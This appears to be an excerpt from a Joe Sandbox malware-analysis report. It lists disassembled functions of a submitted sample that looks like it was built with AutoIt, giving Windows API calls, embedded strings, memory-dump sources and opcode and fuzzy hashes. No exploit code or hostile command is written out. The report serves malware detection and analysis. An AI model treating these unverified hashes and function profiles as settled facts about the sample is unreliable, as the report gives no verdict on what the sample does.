                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                            • String ID: AutoIt v3 GUI
                                                            • API String ID: 1458621304-248962490
                                                            • Opcode ID: 30a413c53a14a12ea8aa8e68dd635b23a53c276a49b27b4b0a9a3ae1f92d26ca
                                                            • Instruction ID: 8afbaf533734b434cea058a927d819182a6e4cdb0675acdb90cccc65d4622830
                                                            • Opcode Fuzzy Hash: 30a413c53a14a12ea8aa8e68dd635b23a53c276a49b27b4b0a9a3ae1f92d26ca
                                                            • Instruction Fuzzy Hash: F7B14E7160120AEFDB14DFA8DC45BEE7BB9FF08714F14422AFA15E6290DB749860CB50
                                                            Function 00894069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 008940F6
                                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 008941B6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: BuffCharMessageSendUpper
                                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                            • API String ID: 3974292440-719923060
                                                            • Opcode ID: 3c0abe990a47332c482c242df3786ecf3c55dee8a286eeae16512cfee341aacf
                                                            • Instruction ID: e1c992ac4c545eb3261e01c13e3d11c96259db72298edb00d11ca19d51e2e8ec
                                                            • Opcode Fuzzy Hash: 3c0abe990a47332c482c242df3786ecf3c55dee8a286eeae16512cfee341aacf
                                                            • Instruction Fuzzy Hash: C9A16F702142059BCB14FF64C951E6A73A9FF94314F18596CF896DB792DB30EC4ACB82
                                                            Function 008852F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00885309
                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 00885314
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0088531F
                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 0088532A
                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 00885335
                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 00885340
                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 0088534B
                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00885356
                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00885361
                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 0088536C
                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00885377
                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00885382
                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 0088538D
                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00885398
                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 008853A3
                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 008853AE
                                                            • GetCursorInfo.USER32(?), ref: 008853BE
                                                            • GetLastError.KERNEL32(00000001,00000000), ref: 008853E9
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Cursor$Load$ErrorInfoLast
                                                            • String ID:
                                                            • API String ID: 3215588206-0
                                                            • Opcode ID: 8d58af32315f8099611390241f37cda5608f58d651071d4692a216b4c9f5221a
                                                            • Instruction ID: 549b501776ebaf73c71e5d93c9ff9a6b4b25a013617cc1c712954755c5cbf044
                                                            • Opcode Fuzzy Hash: 8d58af32315f8099611390241f37cda5608f58d651071d4692a216b4c9f5221a
                                                            • Instruction Fuzzy Hash: DD416270E043196ADB10AFBA8C4986EFEB8FF51B50B10452BE509E7291DAB8A4008F55
                                                            Function 0086AA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 0086AAA5
                                                            • __swprintf.LIBCMT ref: 0086AB46
                                                            • _wcscmp.LIBCMT ref: 0086AB59
                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0086ABAE
                                                            • _wcscmp.LIBCMT ref: 0086ABEA
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 0086AC21
                                                            • GetDlgCtrlID.USER32(?), ref: 0086AC73
                                                            • GetWindowRect.USER32(?,?), ref: 0086ACA9
                                                            • GetParent.USER32(?), ref: 0086ACC7
                                                            • ScreenToClient.USER32(00000000), ref: 0086ACCE
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 0086AD48
                                                            • _wcscmp.LIBCMT ref: 0086AD5C
                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 0086AD82
                                                            • _wcscmp.LIBCMT ref: 0086AD96
                                                              • Part of subcall function 0083386C: _iswctype.LIBCMT ref: 00833874
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                            • String ID: %s%u
                                                            • API String ID: 3744389584-679674701
                                                            • Opcode ID: 04e30688e1edd1abcab8fb7541953cfdcb8f43b742efed080bdd57a0220752a4
                                                            • Instruction ID: 726777711cf255258bb10ba83eeb0cd6a6f4d1a34e1be324f066e7b7a1e9f05f
                                                            • Opcode Fuzzy Hash: 04e30688e1edd1abcab8fb7541953cfdcb8f43b742efed080bdd57a0220752a4
                                                            • Instruction Fuzzy Hash: B6A1D071204306AFD718EF64C884FAAB7E8FF44355F00462AFA99E2191DB30E955CF92
                                                            Function 0086B397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetClassNameW.USER32(00000008,?,00000400), ref: 0086B3DB
                                                            • _wcscmp.LIBCMT ref: 0086B3EC
                                                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 0086B414
                                                            • CharUpperBuffW.USER32(?,00000000), ref: 0086B431
                                                            • _wcscmp.LIBCMT ref: 0086B44F
                                                            • _wcsstr.LIBCMT ref: 0086B460
                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 0086B498
                                                            • _wcscmp.LIBCMT ref: 0086B4A8
                                                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 0086B4CF
                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 0086B518
                                                            • _wcscmp.LIBCMT ref: 0086B528
                                                            • GetClassNameW.USER32(00000010,?,00000400), ref: 0086B550
                                                            • GetWindowRect.USER32(00000004,?), ref: 0086B5B9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                            • String ID: @$ThumbnailClass
                                                            • API String ID: 1788623398-1539354611
                                                            • Opcode ID: de3e644be195307c91c3b2b4913e04d03b645df4b5e45dd318be50fe7d96215e
                                                            • Instruction ID: e8602f0195f5b73f80973e94b87466debd2ca4d5f4324076a58acf3f37c4fa69
                                                            • Opcode Fuzzy Hash: de3e644be195307c91c3b2b4913e04d03b645df4b5e45dd318be50fe7d96215e
                                                            • Instruction Fuzzy Hash: B381B0710083059BDB05DF14C885FAA7BE8FF94318F08856AFD86DA192DB34DD85CBA2
                                                            Function 0086B1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                            • API String ID: 1038674560-1810252412
                                                            • Opcode ID: 934d510b012264f5f6eb378266f8a43843f0f0876b4d7108c07cd383fccf1007
                                                            • Instruction ID: 7e528112d85f0ab3fdb21d974f9bcc5ba36b1a2768d909a31d22e9fb2b260267
                                                            • Opcode Fuzzy Hash: 934d510b012264f5f6eb378266f8a43843f0f0876b4d7108c07cd383fccf1007
                                                            • Instruction Fuzzy Hash: 1F31CB31A44209A6DB10FA68DD57FEE77B8FF20754F200068F491F12D2EF65AE84C692
                                                            Function 0086C4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadIconW.USER32(00000063), ref: 0086C4D4
                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0086C4E6
                                                            • SetWindowTextW.USER32(?,?), ref: 0086C4FD
                                                            • GetDlgItem.USER32(?,000003EA), ref: 0086C512
                                                            • SetWindowTextW.USER32(00000000,?), ref: 0086C518
                                                            • GetDlgItem.USER32(?,000003E9), ref: 0086C528
                                                            • SetWindowTextW.USER32(00000000,?), ref: 0086C52E
                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0086C54F
                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0086C569
                                                            • GetWindowRect.USER32(?,?), ref: 0086C572
                                                            • SetWindowTextW.USER32(?,?), ref: 0086C5DD
                                                            • GetDesktopWindow.USER32 ref: 0086C5E3
                                                            • GetWindowRect.USER32(00000000), ref: 0086C5EA
                                                            • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0086C636
                                                            • GetClientRect.USER32(?,?), ref: 0086C643
                                                            • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0086C668
                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0086C693
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                            • String ID:
                                                            • API String ID: 3869813825-0
                                                            • Opcode ID: 04865861c4ac71acfac2b1a9784f8061a38884b8083bdb2d0b6e2d0dbd5bf973
                                                            • Instruction ID: c3987d62a782f49cd98154ed89839c61bbd4e62a58467f9b3d8e8bd9d76db644
                                                            • Opcode Fuzzy Hash: 04865861c4ac71acfac2b1a9784f8061a38884b8083bdb2d0b6e2d0dbd5bf973
                                                            • Instruction Fuzzy Hash: B0518D31A00709AFDB21EFA8CD89B7EBBF5FF04704F004929E682E25A1D774A904CB50
                                                            Function 0089A428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 0089A4C8
                                                            • DestroyWindow.USER32(?,?), ref: 0089A542
                                                              • Part of subcall function 00817D2C: _memmove.LIBCMT ref: 00817D66
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0089A5BC
                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0089A5DE
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0089A5F1
                                                            • DestroyWindow.USER32(00000000), ref: 0089A613
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00810000,00000000), ref: 0089A64A
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0089A663
                                                            • GetDesktopWindow.USER32 ref: 0089A67C
                                                            • GetWindowRect.USER32(00000000), ref: 0089A683
                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0089A69B
                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0089A6B3
                                                              • Part of subcall function 008125DB: GetWindowLongW.USER32(?,000000EB), ref: 008125EC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                            • String ID: 0$tooltips_class32
                                                            • API String ID: 1297703922-3619404913
                                                            • Opcode ID: ba2f8c8d5a7c0e56d69f32d87aac1fbfadd679ce83acc340c4850f2c5562f092
                                                            • Instruction ID: 4f5abbfe3b161c54ca0d9f12064be1e1ef9d62eb037bcdfd11651d31798fef42
                                                            • Opcode Fuzzy Hash: ba2f8c8d5a7c0e56d69f32d87aac1fbfadd679ce83acc340c4850f2c5562f092
                                                            • Instruction Fuzzy Hash: 8171BD71144209AFDB29EF28CC45FA67BE9FB98304F08052DF985C72A1D774E951CB52
                                                            Function 0089C8EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00812612: GetWindowLongW.USER32(?,000000EB), ref: 00812623
                                                            • DragQueryPoint.SHELL32(?,?), ref: 0089C917
                                                              • Part of subcall function 0089ADF1: ClientToScreen.USER32(?,?), ref: 0089AE1A
                                                              • Part of subcall function 0089ADF1: GetWindowRect.USER32(?,?), ref: 0089AE90
                                                              • Part of subcall function 0089ADF1: PtInRect.USER32(?,?,0089C304), ref: 0089AEA0
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0089C980
                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0089C98B
                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0089C9AE
                                                            • _wcscat.LIBCMT ref: 0089C9DE
                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0089C9F5
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0089CA0E
                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0089CA25
                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0089CA47
                                                            • DragFinish.SHELL32(?), ref: 0089CA4E
                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0089CB41
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                            • API String ID: 169749273-3440237614
                                                            • Opcode ID: d01a4b51ffb7e3a526e2584d2e2ae84a723911be54e1e936741f5b5b7ccdbd79
                                                            • Instruction ID: 7f8a8c64b03e1cb3b295641d13a3146adb85001405cfcaba061f978f1b95bbdd
                                                            • Opcode Fuzzy Hash: d01a4b51ffb7e3a526e2584d2e2ae84a723911be54e1e936741f5b5b7ccdbd79
                                                            • Instruction Fuzzy Hash: C3615971108300AFC705EF64DC85D9BBBE8FF88710F040A2EF691D22A1EB309A49CB52
                                                            Function 00894619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 008946AB
                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 008946F6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: BuffCharMessageSendUpper
                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                            • API String ID: 3974292440-4258414348
                                                            • Opcode ID: eb710b559b6e252d51c56cb02529c349750aa533d3f875416ba3ed56bb016b5d
                                                            • Instruction ID: 929effb461f29aa3a3a724b0d3dfa9b38ce957d22bd2b982662de3115cdee9dd
                                                            • Opcode Fuzzy Hash: eb710b559b6e252d51c56cb02529c349750aa533d3f875416ba3ed56bb016b5d
                                                            • Instruction Fuzzy Hash: BC917C742047059BCB14EF58C461E6ABBA5FF94314F04446CE896DB3A2DB34ED4ACB82
                                                            Function 0089BAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0089BB6E
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00899431), ref: 0089BBCA
                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0089BC03
                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0089BC46
                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0089BC7D
                                                            • FreeLibrary.KERNEL32(?), ref: 0089BC89
                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0089BC99
                                                            • DestroyIcon.USER32(?,?,?,?,?,00899431), ref: 0089BCA8
                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0089BCC5
                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0089BCD1
                                                              • Part of subcall function 0083313D: __wcsicmp_l.LIBCMT ref: 008331C6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                            • String ID: .dll$.exe$.icl
                                                            • API String ID: 1212759294-1154884017
                                                            • Opcode ID: 0e8751124e659701f60522bf2797e76bc4a944c4634148e827ad2368ec74a56f
                                                            • Instruction ID: 25d1bd2f262ed730825ae2e9950d27d5f9c0dba7e0602860e44b9c6023b62a8c
                                                            • Opcode Fuzzy Hash: 0e8751124e659701f60522bf2797e76bc4a944c4634148e827ad2368ec74a56f
                                                            • Instruction Fuzzy Hash: 4161CC71600619BAEF14EF64DD86FBE77A8FF08720F14411AF915D61C1DB74A990CBA0
                                                            Function 0087A5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00819997: __itow.LIBCMT ref: 008199C2
                                                              • Part of subcall function 00819997: __swprintf.LIBCMT ref: 00819A0C
                                                            • CharLowerBuffW.USER32(?,?), ref: 0087A636
                                                            • GetDriveTypeW.KERNEL32 ref: 0087A683
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0087A6CB
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0087A702
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0087A730
                                                              • Part of subcall function 00817D2C: _memmove.LIBCMT ref: 00817D66
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                            • API String ID: 2698844021-4113822522
                                                            • Opcode ID: f1cd73d53aaaced5659410d06477a687ca867094269db7811f53cdaa69eaba75
                                                            • Instruction ID: dc337ead8ab6e6d84b4e473df174bd196aa87eabddc9eb588ade3c6aad027840
                                                            • Opcode Fuzzy Hash: f1cd73d53aaaced5659410d06477a687ca867094269db7811f53cdaa69eaba75
                                                            • Instruction Fuzzy Hash: 4A5139711042089FC704EF24C891DAAB7F8FF94758F04896DF89A97251DB35EE4ACB42
                                                            Function 0087A45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0087A47A
                                                            • __swprintf.LIBCMT ref: 0087A49C
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0087A4D9
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0087A4FE
                                                            • _memset.LIBCMT ref: 0087A51D
                                                            • _wcsncpy.LIBCMT ref: 0087A559
                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0087A58E
                                                            • CloseHandle.KERNEL32(00000000), ref: 0087A599
                                                            • RemoveDirectoryW.KERNEL32(?), ref: 0087A5A2
                                                            • CloseHandle.KERNEL32(00000000), ref: 0087A5AC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
